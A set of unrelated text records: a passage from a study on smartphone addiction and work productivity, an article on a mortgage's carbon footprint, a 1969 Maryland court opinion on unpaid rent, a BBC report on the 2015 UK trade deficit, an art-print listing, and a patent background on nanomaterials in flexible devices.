Crucially, there exists a spectrum of views among researchers as to the validity of smartphone addiction as a specific sub-type of behavioural addiction (see [@bb0040] for a discussion; and [@bb0180] for a related review of the Internet addiction concept). While some work suggests the absolute existence of a specific smartphone addiction, several researchers highlight the role of problematic behaviours (e.g. the checking habit discussed above, [@bb0125]), personality traits (e.g. impulsivity, [@bb0015]; and a lack of inhibitory control, e.g. [@bb0020]) and psychiatric co-morbidities (e.g. ADHD, depression; [@bb0155]) in Internet and smartphone overuse. An important, and as yet unresolved, theoretical point is whether such addiction is related to the smartphone itself or if the smartphone is merely a medium through which an individual accesses other addictions, e.g. through use of applications for chatting with friends, playing games or shopping. The latter idea is supported by recent evidence suggesting social network use and game playing on the smartphone were significant predictors of smartphone addiction ([@bb0060]). Unpublished work by our lab also supports the idea of a common personality type that underlies both Internet and smartphone addiction, with the greatest predictor of addiction being low levels of self-directedness. Given these points, it seems likely that addictions to the smartphone and / or Internet likely arise as a by-product of certain personality and diverse behavioural factors (for a wider discussion, see the I-PACE model by [@bb0010]), thus it is crucial that we investigate how individuals interact with their smartphones in everyday life.
With the present short report, we aim to illustrate how tendencies towards smartphone addiction, interruptions by the smartphone (and resultant work hours lost due to smartphone use) and self-reported productivity are interrelated. We expect that higher tendencies towards smartphone addiction are associated with higher numbers of daily interruptions by the smartphone and lower reported productivity**.**
Methods {#s0010}
=======
*Participants & recruitment process.*
A website was designed to attract participants for our research on smartphone use. This website has been promoted across German media (TV and press) and has also been publicised by the German Government\'s *Drogenbeauftragte* (office for the regulation of drug use) via [www.drogenbeauftragte.de](http://www.drogenbeauftragte.de){#ir0010}. Between January 2016 and September 2016, 605 participants completed the online questionnaires (248 males and 357 females; mean-age: 29.64, SD = 12.99). Upon completion of the online questionnaires, all users received individualised feedback on their smartphone addiction score compared to a sample of users from the town of Ulm in Germany. This benchmark-sample had been collected previously in a different context and included no data on daily interruptions or self-reported productivity. Of a total of 605 participants, 379 met the criteria for inclusion in the current study, i.e. reported being in employment, over the age of 14 and owning a smartphone. The present study received ethical approval from the local ethics\' committee of Ulm University, Ulm, Germany.
*Questionnaires.*
All participants answered questionnaires on smartphone ownership, private and work-related smartphone use in hours per week, smartphone addiction and productivity.
In order to assess smartphone addiction, we used the short Smartphone Addiction Scale (SAS; [@bb0065]). This ten-item scale is assessed on a six-point Likert scale, with less addictive tendencies corresponding to the lowest score (10) and greatest addictive tendencies corresponding to the highest score (60). We translated this questionnaire into German (and back translated it into English). We also modified the questionnaire slightly to make it more accessible for participants. Namely, we re-worded several items into the first-person format. As an example, where the original item stated, "Missing planned work due to smartphone use", we changed it to "I miss planned work due to smartphone use". Internal consistency for the Smartphone Addiction Scale (SAS) was excellent (alpha = 0.87). As we used a 0--5 scale (ranging from strongly disagree (0) to strongly agree (5)), rather than a 1--6 scale, a constant of 10 is added to participants\' scores to facilitate comparison with the original [@bb0065] data (see [Table 1](#t0005){ref-type="table"}).Table 1Means and standard deviations for all variables.Table 1:MeanSDTotal SAS scores13.095 (23.09)[⁎](#tf0005){ref-type="table-fn"}9.32WPAI:GH 2 During the past 7 days how many work hours have you missed due to health problems?1.37 h5.18 hWPAI:GH 3 During the past 7 days how many work hours have you missed for any other reason?3.28 h7.38 hWPAI:GH 4 During the past 7 days how many hours have you actually worked?23.08 h12.93 hWPAI:GH 5 During the past 7 days how much did health problems affect your productivity while you were working?1.642.37WPAI:GH 6 During the past 7 days how much did health problems affect your ability to do regular daily activities, e.g. housework?2.002.50WPAI:GH 5 (ADAPTED) During the past 7 days how much did your smartphone use affect your productivity while you were working?1.882.11WPAI:GH 6 (ADAPTED) During the past 7 days how much did your smartphone use affect your ability to do regular daily activities, e.g. housework?2.332.19Number of work hours lost to smartphone use in the past 7 days1.76 h3.35 hAverage weekly minutes worked without interruption from smartphone123.16 mins119.90 minsLongest period (in mins) without interruption157.55 mins137.54 minsNumber of hours spent on smartphone for leisure13.28 h12.05 hNumber of hours spent on smartphone for work2.86 h5.48 h[^1]
Productivity at work and in relation to smartphone use was assessed with several questions based on the *Work Productivity and Activity Impairment - General Health* questionnaire (WPAI-GH; see [@bb0130]). The original version of the questionnaire comprises six items assessing current employment (yes/no), number of work hours missed due to ill health in the past seven days, hours of work missed for other reasons (e.g. vacation or completing this questionnaire at work) and actual number of hours worked in the past seven days. The remaining two items ask participants to indicate on an 11-point Likert scale (ranging from 0 to 10) to what extent their health problems have affected either productivity at work (item 5) or daily activities excluding work (item 6). The number "0 "indicates that health has had no effect on productivity and "10 "indicates a complete inability to work due to one\'s ill health. We used the German version provided by Reilly Associates on the website: <http://www.reillyassociates.net/WPAI_Translations.html> (last accessed 21/05/2016). Items 5 and 6 of the WPAI-GH are designed to assess productivity at work. As such, these items were also administered with the word *smartphone* in place of the word *health* to assess how smartphone use affected productivity (these items are identified by the label "ADAPTED" in the tables below). We also included an additional item to query how many minutes each day a person can work without digital interruptions (we asked for an average estimate in minutes). Finally, we asked about the duration of the longest phase without interruptions (again we asked for an average estimate in minutes, i.e. if a person has three uninterrupted session of 60, 50 and 40 min - resulting in 150 min of uninterrupted work - the longest uninterrupted session from this would have been 60 min). Additional questionnaires on life satisfaction, etc. have been collected for another research project and will not be discussed further in this paper. For the purposes of the current study, we worked with the raw scores from each WPAI-GH item. It is also possible to conceptualise the scale in other ways, e.g. impairment as a percentage (see <http://www.reillyassociates.net/WPAI_Scoring.html>, accessed on 24th August 2017).
*Statistical analysis.*
Data Cleaning: Of a total of 605 participants, 379 met the criteria for inclusion in the current study, i.e. reported being in paid employment, above the age of 14 (i.e. the legal employment age in Germany), and owning a smartphone. After this initial screening, we excluded a further 38 participants due to implausible scores on variables, e.g. spending 800 h of leisure time on the smartphone in the past week or working uninterrupted for 24 h daily. Of the remaining participants, 79 reported working more than a standard 40-h week. The results were not altered by including or excluding these participants; however, we excluded them due to their non-representative work pattern and to minimise artificial inflation of results due to sample size. This left us with a final sample size of *N* = 262 (168 female, mean-age 32.03, SD = 11.08).
*Remaining analysis.*
Given the non-parametric distribution of the data, the experimental variables of interest were tested using a series of Spearman\'s rho (r~s~) correlations. Gender differences were explored using a Mann-Whitney-*U* test. Partial correlations were carried out on ranked data in accordance with [@bb0025]. A mediation analysis was carried out post-hoc to explore the relationship between SAS scores and self-reported negative effect of smartphone use on work productivity, with daily interruptions (defined as the number of work hours lost to smartphone use) as a mediator. All statistical analyses were carried out using SPSS v. 22 for MAC.
Results {#s0020}
=======
*Participant demographics; gender and SAS scores.*
Mean SAS scores for females (*M* = 13.43, *SD* = 9.18) were higher than for males (*M* = 11, *SD* = 8.07). This difference was just shy of significance (*U* = 13,677, *z* = − 1.92, *p* = 0.055). A negative association was observed between age and SAS scores (*r*~*s*~ = − 0.269, *p* \< 0.01). [Table 1](#t0005){ref-type="table"} shows mean scores and standard deviations for the key variables under study.
*SAS and productivity.*
Productivity, as assessed by the modified WPAI-GH indicated a moderate positive relationship between hours at work lost due to the smartphone during the last seven days and total SAS scores (*r*~*s*~ = 0.372, *p* \< 0.01). In-keeping with this observation, a moderate relationship was also observed between the negative effect of smartphone use on productivity (self-reported observation) and total SAS score (*r*~*s*~ = 0.436, *p* \< 0.01). Similarly, a moderate negative correlation could be seen between total SAS and the number of minutes worked without interruption (*r*~*s*~ = − 0.366, *p* \< 0.01) and weaker correlations with the number of hours actually worked in the past seven days (*r*~*s*~ = − 0.103, *p* = 0.09). [Table 2](#t0010){ref-type="table"} shows the correlational relationships for the SAS scores and work-related productivity variables.Table 2Correlational relationships between total SAS scores and work productivity variables.Table 2:SAS\
Number of work hours lost to smartphone use past 7 days\
0.372[⁎⁎](#tf0015){ref-type="table-fn"}\
Average weekly minutes worked without interruption from smartphone\
\
− 0.366[⁎⁎](#tf0015){ref-type="table-fn"}\
WPAI:GH 4 During the past 7 days how many hours have you actually worked?\
− 0.103\
WPAI:GH 5 (ADAPTED) During the past 7 days how much did your smartphone use affect your productivity while you were working?\
\
0.436[⁎⁎](#tf0015){ref-type="table-fn"}[^2]
*SAS and other activities.*
SAS scores were also observed to have an impact on other areas of an individual\'s life. Predictably, SAS scores had a moderate correlation with the number of hours spent on the smartphone for leisure (*r*~*s*~ = 0.428, *p* \< 0.01). In contrast a very slight relationship was observed between total SAS and hours spent on the smartphone for work (*r*~*s*~ = 0.130, *p* \< 0.05). A strong relationship emerged for people citing the negative effects of smartphone use on non-work related, everyday activities in their lives, e.g. housework and total SAS scores (*r*~*s*~ = 0.572, *p* \< 0.01). [Table 3](#t0015){ref-type="table"} depicts the correlational relationships between SAS scores and everyday life variables.Table 3Correlational relationships between total SAS scores and everyday life variables.Table 3:SASNumber of hours spent on smartphone for leisure0.428[⁎⁎](#tf0025){ref-type="table-fn"}Number of hours spent on smartphone for work0.13[⁎](#tf0020){ref-type="table-fn"}WPAI:GH 6 (ADAPTED) During the past 7 days how much did your smartphone use affect your ability to do regular daily activities, e.g. housework?0.572[⁎⁎](#tf0025){ref-type="table-fn"}[^3][^4]
*SAS scores, work productivity and ill health*.
We also assessed the impact of participants\' ill health on their work productivity over the past seven days. Participants reported missing on average 1.37 work hours (*SD* = 5.18 h) due to poor health during the week. On average, bad health was thought to affect productivity by 1.64 points (*SD* = 2.37) per week on the eleven-point Likert scale of the WPAI-GH. We subsequently computed partial correlations for the above main variables of interest (SAS and work productivity), this time controlling for the self-reported negative impact of ill health on productivity. The correlation coefficients are reported in [Table 4](#t0020){ref-type="table"}.Table 4Partial correlation relationships between SAS scores and work productivity, controlling for the negative impact of ill health on productivity.Table 4:SAS\
Number of work hours lost to smartphone use past 7 days\
0.301[⁎⁎](#tf0030){ref-type="table-fn"}\
Average weekly minutes worked without interruption from smartphone\
− 0.412[⁎⁎](#tf0030){ref-type="table-fn"}\
WPAI:GH 4 During the past 7 days how many hours have you actually worked?\
− 0.050\
WPAI:GH 5 (ADAPTED) During the past 7 days how much did your smartphone use affect your productivity while you were working?\
0.522[⁎⁎](#tf0030){ref-type="table-fn"}[^5]
*Post-hoc analyses.*
Post-hoc analyses revealed a partial effect of mediation by the variable assessing number of work hours lost to smartphone use in the past seven days (daily interruptions) on the relationship between SAS scores and the negative effect of smartphone use on work productivity (see [Fig. 1](#f0005){ref-type="fig"}). SAS scores significantly predicted the number of work hours lost to smartphone use in the past seven days (path a, *F* (1, 260) = 25.104, *p* \< 0.01; *R*^*2*^ = 0.088; *b* = 0.106, *t*(260) = 5.01, *p* \< 0.01), and daily interruptions significantly predicted the negative impact of smartphone use on work productivity (path b, *F* (2, 259) = 84.238, *p* \< 0.01; *R*^*2*^ = 0.495; *b* = 0.311, *t*(259) = 9.18, *p* \< 0.01). While SAS scores significantly predicted the self-reported negative impact of smartphone use on work productivity (path c', *F* (1, 260) = 97.89, *p* \< 0.01; *R*^*2*^ = 0.523; *b* = 0.117, *t*(260) = 9.89, *p* \< 0.01), this effect was greater in the presence of the mediator, daily interruptions (path c, *F* (2, 259) = 86.303, *p* \< 0.01; *R*^*2*^ = 0.632; *b* = 0.234, *t*(259) = 7.39, *p* \< 0.01). A Sobel test was conducted and indicated a significant effect of mediation (*z* = 4.419, *p* \< 0.01), suggesting that the work hours lost to smartphone use goes some way towards explaining the relationship between SAS scores and self-reported negative impact of smartphone use on work productivity.Fig. 1Mediation analysis with SAS scores as the predictor, daily interruptions (defined as the number of work hours lost to smartphone use) as the mediator, and the self-reported negative impact of smartphone use on work productivity as the dependent variable. a = path a; b = path b; c = total effect, i.e. SAS scores on productivity, mediated by daily interruptions; c' = direct effect of SAS scores on productivity; *b* = unstandardized regression coefficients.^⁎⁎^*p* \< 0.01.Fig. 1:
Discussion {#s0025}
==========
This report sought to illustrate the interrelations between smartphone addiction, smartphone interruptions and work-related productivity. We expected that higher tendencies towards smartphone addiction would be associated with a greater level of daily interruptions by the smartphone and with lower reported productivity at work.
In line with these predictions, we observed moderate relationships between smartphone addiction, as measured by SAS scores, and variables associated with the distracting nature of the smartphone. Specifically, a moderate relationship existed between higher SAS scores and participants reporting decreased productivity due to the time spent on the smartphone while at work, as well as people spending fewer minutes working without interruption from the smartphone. Significant relationships were also observed between SAS scores and number of work hours lost due to smartphone usage, as well as a negative relationship between higher SAS scores and the number of hours actually worked in the previous seven days.
Further analysis also indicated significant negative relationships between smartphone use and negative effects on participants\' personal lives. Predictably, higher SAS scores were moderately related to a greater amount of leisure time spent on the smartphone. As with time spent on the smartphone during work hours, participants reported a strong relationship between SAS scores and negative effects of smartphone use on daily activities during leisure time.
These data suggest that smartphone use was perceived by participants to have a negative effect on both their work-related and non-work-related productivity. Participants appeared to be spending more time on the smartphone while at work than they felt was optimal, suggesting that despite awareness of the negative effects of smartphone use at work, participants continue to engage in smartphone use behaviours. Post-hoc analyses indicated a significant effect of mediation by the variable assessing the number of hours lost to smartphone use on the relationship between SAS scores and self-reported negative impact of smartphone use on work productivity. This relationship is interesting in light of recent work by [@bb0020], suggesting a deficit in inhibitory control among excessive smartphone users. Such an inhibitory deficit makes sense considering research by [@bb0125], which suggested that short, frequent "checking" behaviours account for much smartphone use. Indeed, recent work ([@bb0085]) indicates that smartphone users exhibit such checking behaviour as often as every 18 min. We have also previously observed that many smartphone users check their phones in the first five minutes after waking and the last five minutes before sleeping ([@bb0110]). Given the empirical support for such impulsive and frequent smartphone use, we were surprised to note the relatively long period of time (almost 2.5 h) participants in the present study reported spending at work without interruption by the smartphone, especially given participants\' perception of the negative effects of phone use on work productivity. We would tentatively suggest that much phone checking behaviour may be automatic and unconscious, leading participants to underestimate the frequency with which they actually interact with their smartphone. Work by [@bb0080] lends some credence to this hypothesis. They examined the relationship between self-reported smartphone use and app-recorded smartphone use among the same group of participants and found that self-reported frequency and duration of smartphone use was significantly underestimated by participants. Previous research from our group also supports the notion that smartphone users seem to have time distortions on these digital devices and problems in assessing their consumption ([@bb0095]). The present study also asked participants how many work hours per week were lost to smartphone use, as well as how much time (in minutes) they spent on the smartphone while at work. These data yielded inconsistent reports, suggesting that participants had either misunderstood the questions or were indeed experiencing time distortion related to their smartphone use; however, as we could not discern whether the participants had in fact understood the items, we did not explore these data further. Further research examining work productivity and smartphone use would be advised to use a more reliable measure of smartphone use, such as tracking the usage by direct recording of the smartphone, a research area which has been dubbed Psychoinformatics (Markowetz et al., 2015; [@bb0105]). Such "checking" behaviour poses a clear difficulty in achieving a state of flow at work. Given the substantial correlation observed between SAS scores and the perceived negative influence of the smartphone on work productivity, we suggest that frequent, automatic phone checking behaviours undermine workers\' ability to achieve a state of flow in the workplace and, thus, undermines their productivity. We stress that this extrapolation requires further empirical testing.
This relationship between SAS scores and the self-perceived negative influence of smartphone use on productivity also raises questions about users\' motivation to engage in smartphone activity during the workday. Several recent studies (e.g. [@bb0150], [@bb0170]) suggest that smartphone usage may be motivated by perceived stress within academic contexts. It is possible that perceived stress in the workplace may motivate workers to "escape" on to their smartphones. Interestingly, when we controlled for the impact of ill health on work productivity, the correlation between total SAS scores and the perceived negative impact of smartphone use on work productivity increased in size. This suggests to us that participants are not merely engaging in smartphone use when they are feeling unwell or unable to work efficiently, but rather that a more complex motivation is driving their smartphone use, e.g. stress. Additional research is warranted to investigate this theory and to examine exactly what applications users are engaging with while in the workplace, e.g. are they seeking social support from friends on WhatsApp or are they escaping reality with games or videos?
Interestingly, the negative effects of smartphone use on productivity were not limited to work, but also -- and more strongly -- affected other daily activities outside of work. Participants reported spending an average of approximately 13 h on their smartphone for leisure activities during the week (though, again, this estimate may be subject to time distortion; by directly tracking smartphone use, we previously found that users spend about 160 min per day on their smartphone, suggesting a weekly duration of about 19 h -- see [@bb0100]), yet rather than a relaxing leisure pursuit, they perceived that this smartphone use negatively affected other activities in their daily lives. Lee, Chang, Lin & Chen (2014) suggest that smartphone use in and of itself may be a source of stress for users. They describe "technostress", originally conceptualised as the direct or indirect negative influence of technology, including smartphones, computers and the Internet, among others, on one\'s attitudes, behaviours, thoughts or physiology, including perceptions and emotions pertaining to the increased prevalence of technology in the workplace and society ([@bb0055], [@bb0175]). Earlier work by [@bb0165] seems to support the idea of technostress. Their work with young adults indicated that for many young people, the round-the-clock accessibility afforded by mobile phones results in feelings of never being free and guilt at the inability to respond to all calls and messages ([@bb0160]; for a good overview on technostress see review by [@bb0140]). Contrary to popular belief, Thomée et al. found no evidence to support a relationship between mobile phone use and increased social support, but rather, that those young adults who reported finding the accessibility promoted by mobile phones to be stressful, were at an increased risk of mental health problems one year later ([@bb0165]). Considering the possible inhibitory control problems among excessive smartphone users ([@bb0020]), it is easy to see how this situation could become overwhelming for the user. Again, this is just one possible explanation for the observed results and additional empirical work is required to test these ideas.
The SAS was developed by [@bb0065], who reported mean scores of 27.89 (females) and 23.75 (males). The observed means for the SAS in the present study were comparable (note: a constant of 10 was added to SAS scores from the present study to enable comparison between the scales). In contrast to the original study, no significant gender difference was observed on SAS scores (although our results approached significance with females scoring higher on the SAS). This result reflects diverging results in the existent literature. For example, [@bb0050] observed higher levels of technostress among female computer-users compared to their male peers. However, more recent research by [@bb0145] revealed contrary results, with males exhibiting higher levels of stress (assessed by galvanic skin response) in reaction to a computer breakdown, compared with their female counterparts. The present study also lends validation to the SAS in the context of an adult (rather than teenaged), German sample. The conflicting results regarding gender differences in SAS scores are also worthy of further research. Previous work by our lab indicates that females are more active on WhatsApp compared with males ([@bb0100]). Future research could investigate whether specific patterns of smartphone use differ between genders and whether different motivations underlie such usage patterns, e.g. females are typically socialised to be more socially responsive, which may foster a more 'social' profile of smartphone use compared with males.
The present study is limited by a number of factors. We have discussed difficulties with the reliability of self-report data elsewhere (see [@bb0105]); most relevant for the present study, we wish to emphasize the difficulty with which many individuals recall past events, even over such as short time period as a week. As discussed above, smartphone use estimates are subject to time distortion by users ([@bb0080]) and given potential negative implications associated with the term "addiction", participants\' responses may be subject to social desirability bias (though, given the comparable responses between our data set and that of [@bb0065], this seems less likely). We also wish to note that the average self-reported negative impact of smartphone use on work productivity was quite low (*M* = 1.88, *SD* = 2.11). With these limitations in mind, it is important that we do not overemphasise these results, but look to them as a starting point for further, more objective psychoinformatic research. Furthermore, it should be acknowledged that we do not know what applications participants were using on their smartphones during this time period. Given the aforementioned "technostress" associated with the social applications of the smartphone ([@bb0075], [@bb0165]; 2010), future research should seek to objectively quantify how much time is spent on what apps when users are engaged in smartphone use. Finally, it is very difficult to operationalize productivity. We used a well-known and accepted scale for assessing productivity via a self-report. More objective measures related to a specific profession are also of importance and should be considered by future research.
Conclusion {#s0030}
==========
The present study sought to explore the interrelatedness of smartphone addiction, smartphone interruptions and work-related productivity. Moderate correlational relationships illustrated the relationships between these variables, so that smartphone addiction was associated with self-reported negative effects on productivity, both in the work place and in participants\' daily lives.
None.
CM is funded by a Heisenberg grant awarded to him by the German Research Foundation (DFG; MO 2363/3-1).
ÉD is supported by the Economic and Social Science Research Council (ES/J00124/1).
Contributions.
==============
CM designed the present study. CM and ÉD drafted the manuscript. ÉD carried out the statistical analysis.
<http://time.com/4695/7-controversial-ways-facebook-has-used-your-data/> (accessed on 21st October 2016)
[^1]: Number in brackets is the raw score plus a constant of 10 to facilitate comparison to the original [@bb0065] scale. As the WPAI:GH 1 comprises a yes / no question on employment status, it is omitted from the above Table.
[^2]: Correlation significant at *p* \< 0.01.
[^3]: Correlation significant at *p* \< 0.05.
[^4]: Correlation significant at *p* \< 0.01.
[^5]: Correlation significant at *p* \< 0.01.
|
{
"pile_set_name": "PubMed Central"
}
|
The carbon footprint of a mortgage:
800kg CO2e per year for a £100,000 loan at 5% interest
How can a mortgage have a carbon footprint? Surely it just boils down to a few bits of paper or electronic transactions? Look more closely. The bank or building society runs offices, buys computers, uses data centres and sends lots of paper mail. Its people travel – often by air. And it hires third-party services ranging from cleaners and caterers to ad agencies.
When you take out a mortgage or loan, or pay for an overdraft, your interest payments feed all this activity, sending a series of economic and environmental ripple effects out across the country and wider world. We can't see these ripples and we don't stand a chance of accurately counting up their environmental impacts one by one. Instead, to get a rough sense of the carbon footprint of a mortgage, we need to use an approach called input-output, which involves taking the total emissions of the UK, divvying them up into different sectors of the economy and then working out the approximate carbon impact of each pound spent in each sector.
Input-output analysis suggests a ballpark footprint of 160g CO2e for every pound spent on UK financial services. The figure is about the same for other professional services, such as solicitors, lawyers, accountants, therapists and architects.
Of course, this figure should be taken with a small pinch of salt – not least because even if it's accurate for the financial industry as a whole, it isn't necessarily accurate for mortgages specifically. It could be, for example, that banks and building societies are more or less carbon intensive than other kinds of financial companies. Or it could be that small transactions (overdrafts, short-term loans, premium account services and the like) clock up more carbon for each pound spent than large transactions such as mortgages. Nonetheless, 160g per pound of interest payments is a reasonable-enough starting point for this back-of-the-envelope calculation.
If you have a £100,000 mortgage on a 5% interest rate, then each year you would pay £5,000 in interest (plus any actual repayments). At 160g per pound, that would add up to a remarkably large annual carbon footprint of around 800kg. That's equivalent to a couple of short-haul flights or the best part of the typical home's annual electricity consumption.
There are two possible ways to reduce this particular part of your carbon footprint. The first is to borrow less and to use the money saved on interest on to pay off a smaller mortgage more quickly. Or, even better, use the savings to fund some kind of carbon-busting project, such as a rainforest conservation scheme or a renewable energy installation. In reality, though, no one is going to choose a smaller or less expensive house based on the carbon cost of their mortgage.
The other, more realistic, line of attack is to be discerning about which bank or building society you give your money to. A tenth of the sector's footprint comes from printing and postage, so supporting a lender that doesn't do junk mail – and which encourages paperless statements – is a good first step. Even more important is air travel, which makes up almost a third of the financial industry's footprint. It's hard to know which bank is least profligate with flying, nor which is most careful about the other elements of its carbon footprint. But a mixture of internet research and common sense will give you an idea. It's probably reasonable, for example, to assume that the Ecology Building Society, a simple, lean, green-minded operation, goes in for far fewer executive business flights than the high-street giants do.
If you're getting a new mortgage as part of a move, once you've signed the contract, the next carbon footprint to consider may be the impact of doing the place up. Given the surprisingly high carbon cost of some contractors, tools and materials, the facelift might be might be even more significant than the mortgage. But that's a another story…
See more carbon footprints.
• This article draws on text from How Bad Are Bananas? The Carbon Footprint of Everything by Mike Berners-Lee
|
{
"pile_set_name": "OpenWebText2"
}
|
252 Md. 265 (1969)
249 A.2d 721
ANTIETAM-SHARPSBURG MUSEUM, INC.
v.
WILLIAM H. MARSH, INC.
[No. 94, September Term, 1968.]
Court of Appeals of Maryland.
Decided February 4, 1969.
The cause was argued before HAMMOND, C.J., and McWILLIAMS, FINAN, SINGLEY and SMITH, JJ.
William J. Dwyer for appellant.
No brief filed for appellee.
McWILLIAMS, J., delivered the opinion of the Court.
We shall be concerned here with an erstwhile landlord's right to collect from his former tenant unpaid rent which accrued prior to the transfer of title to the purchaser. It may all seem somewhat frivolous when one reflects that 106 years ago the possession of the demised premises was disputed by over 100,000 men, 20,000 of whom enriched its soil with their blood.
In 1962 appellant (the Museum) was the owner of the 200 acre "Piper Farm" which lies within the Antietam-Sharpsburg battlefield and through a part of which runs the "Sunken Road," sometimes called "Bloody Lane." In January 1962 the Museum leased the farm to appellee (Marsh) on a month to month basis. In September of 1963 the Museum entered into some kind of an arrangement with the United States. In the testimony it was said, in one place, to be a 60 day option to purchase. In another place it was said to be a contract of sale. Although a copy of the document was admitted in evidence it is not in the transcript *267 of the record. Whatever it may have been, Marsh, for reasons undisclosed, thereafter stopped paying the monthly rent. On 30 June 1964 the Museum executed and delivered to the United States a deed to the "Piper Farm." Marsh at that time owed 8 months rent which he refused to pay and to recover which the Museum, on 14 March 1966, filed suit in the Circuit Court for Washington County. The case was tried before Rutledge, J., without a jury, on 9 February 1968. At the conclusion of the Museum's case Marsh's "motion for a directed verdict" was granted. Once again[1] we remind both bench and bar that the motion for a directed verdict, in these circumstances, is improper. Maryland Rule 535. Judge Rutledge did not give his reasons for directing the verdict nor did the Museum move to require him to do so. Rule 18 c. There was no appearance for Marsh in this Court.
It seems to us to be beyond dispute that rent belongs to the person who owns the property on the day it becomes due. Wise v. Pfaff, 98 Md. 576, 56 A. 815 (1904); Outtoun v. Dulin, 72 Md. 536, 20 A. 134 (1890); Martin v. Martin, 7 Md. 368 (1855); II American Law of Property §§ 9.44 and 9.45 (1952); 52 C.J.S. Landlord and Tenant § 516 (1968). When there is a transfer of title unpaid accrued rent, unless otherwise provided for, belongs to the person who was the landlord at the time of accrual. Likewise current rent is not apportionable, unless by agreement, when the transfer occurs during the rent period. Fahrenbraker v. E. Clemens Horst Co., 209 Cal. 7, 284 P. 905 (1930); Velishka v. Laurendeau, 100 N.H. 46, 118 A.2d 600 (1955); 52 C.J.S. Landlord and Tenant § 516, supra. There was, we think, evidence sufficient to support a finding that Marsh was a month to month tenant of the Museum during all of 1963 and up to and including June 1964. Since the "option contract of sale" is not in the transcript of the record there is no occasion for us to consider what effect, if any, it may have had upon the Museum's right to the accrued rent. In any case there is nothing in the surprisingly scanty testimony to suggest that the United States claims any part of it.
*268 In view of the familiar requirement that the evidence, together with all proper and legitimate inferences to be drawn therefrom, must be considered in a light most favorable to the Museum we cannot understand why, on this record, the learned trial judge directed a verdict for Marsh.
Remanded for further proceedings without affirmance or reversal. Costs to abide the final result.
NOTES
[1] Lewis v. Germantown Ins. Co., 251 Md. 535, 248 A.2d 468 (1968) and cases cited therein.
|
{
"pile_set_name": "FreeLaw"
}
|
The UK's goods trade gap with the rest of the world widened by £1.9bn to a record high of £125bn in 2015, official figures show.
The Office for National Statistics also warned the latest figures would have a negative impact on its second estimate of fourth-quarter economic growth.
But 2015 also saw a record surplus in the UK's dominant services sector of £90bn.
That meant the UK's total trade gap widened by just £300m last year.
The overall deficit - the difference between the amount the UK imports and what it exports - stood at £34.7bn in 2015, the ONS said.
It will publish its second estimate of fourth-quarter economic growth on 25 February.
Image copyright AP
Analysis: Kamal Ahmed, BBC Economics Editor
Britain is very good at exporting services - financial, tourism, creative and legal - where the UK's trade surplus hit a record £90.3bn.
And is notoriously bad at increasing the exports of goods as the UK struggles to rebalance its economy away from consumer consumption towards manufacturing.
The strength of the pound for most of last year is only exacerbating Britain's difficulty selling things abroad.
This has been George Osborne's headache ever since becoming Chancellor in 2010.
Most worrying, trade with Germany and China - the two significant powerhouses of Europe and Asia - weakened in the final quarter of 2015.
There is also an increasing division between the UK's performance in the European Union, where the country's goods trade deficit is widening, and Britain's trade with the rest of the world, where the situation is rosier.
Between 2014 and 2015 exports of goods to countries outside the EU increased by £3.5bn.
Businesses finally seem to be looking beyond the EU's borders for opportunities for growth.
You can read more from Kamal here.
Today's figures also contained December's trade data, which showed the deficit narrowed by £1.3bn to £2,7bn overall in the month.
The goods deficit fell to £9.9bn from £11.5bn in November, but that was thanks to a fall in imports of £1.7bn in December rather than an increase in exports.
A large part of the fall was however accounted for by depressed oil prices, which meant the cost of oil imports fell in value terms to their lowest level since February 2009.
In the three months to the end of December, the UK's trade deficit stood at £10.4bn, compared with £8.6bn in the three months to the end of September.
The UK also suffered a record traded goods deficit of £23.2bn with the rest of the European Union in the fourth quarter of 2015, as exports to other EU countries fell 0.5% and imports from the EU rose 2.7%
The trade deficit is one of the factors cited by analysts as a drag on UK economic growth, which has been exacerbated by the strengthening pound over the past few years.
'Dangerous cocktail'
A stronger pound makes UK exports more expensive for overseas customers.
The UK's overall trade deficit took its toll on growth in the third quarter of 2015, contributing to disappointing economic growth of 0.4%.
Chancellor George Osborne has warned that the economy is facing a "dangerous cocktail" of risks in 2016, ranging from slowing global economic growth to volatile stock markets and the continuing slump in oil prices.
Samuel Tombs, chief UK economist at Pantheon Macroeconomics, said the latest trade figures pointed to net trade subtracting 0.2 percentage points from quarter-on-quarter GDP growth in the fourth quarter of 2015.
"With global trade flows slowing and UK goods still uncompetitive despite sterling's depreciation since December, we expect a poor trade performance to continue to impede the economic recovery this year, " he said.
Paul Hollingsworth, UK economist at Capital Economics, said he believed concerns about a sharp global slowdown were "somewhat overdone".
But he added: "Nonetheless, any progress in reducing the trade deficit is likely to be extremely slow in the near term, leaving the [UK] recovery reliant on domestic demand."
|
{
"pile_set_name": "OpenWebText2"
}
|
Washio Tomoyuki | St Hana
St Hana, 201329cm x 29cmGiclee print on art paperLimited to an edition of 5, signed by artist.
Washio Tomoyuki is an illustrator based in the city of Nagoya, central Japan. He is known for his imaginative characters which are then let loose in his fantastical worlds which he creates with his unique manga infused style. He has been involved in exhibitions in Tokyo and Berlin.
|
{
"pile_set_name": "Pile-CC"
}
|
1. Field of the Invention
The present invention relates to a nanomaterials and, more particularly, to flexible devices containing nanomaterials.
2. Description of Related Art
Electronic devices are responsible for the majority of advancements in technology in the last century, and the complexity of these devices grows in proportion to the exponential advancements in the field. As electronic devices continue to expand into every facet of everyday life, the demand for more durable, robust, and flexible electronic devices becomes increasingly significant. Recent discoveries with respect to nanomaterials have opened new doors with respect to enabling durable, robust, and flexible electronic devices, but these new discoveries come with equally challenging obstacles.
One of the significant challenges encountered with use of nanomaterials in electronic devices relates to a dichotomy between conductive and flexible materials. More specifically, a general dichotomy exists between materials with superior electrical, optoelectronic, semiconductor and/or structural characteristics and materials that are highly compatible with flexible, malleable, and durable composites. Typically materials that have excellent transport properties, regarding conductivity and carrier mobility, are difficult or impossible to directly process on or with materials that are flexible, malleable, and durable. Conversely, those materials that have poor electrical properties are more likely to be compatible with flexible, malleable, and durable materials. In accordance with this dichotomy, nanomaterial structures that have excellent transport or structural properties, such as carbon nanotubes or semiconductor nanowires, are difficult to process and fabricate with flexible, malleable, and durable materials such as polymer substrates. Therefore, it is highly desired to develop methods and systems which permit the incorporation of nanomaterial structures into flexible, malleable, and durable materials, such as polymer substrates.
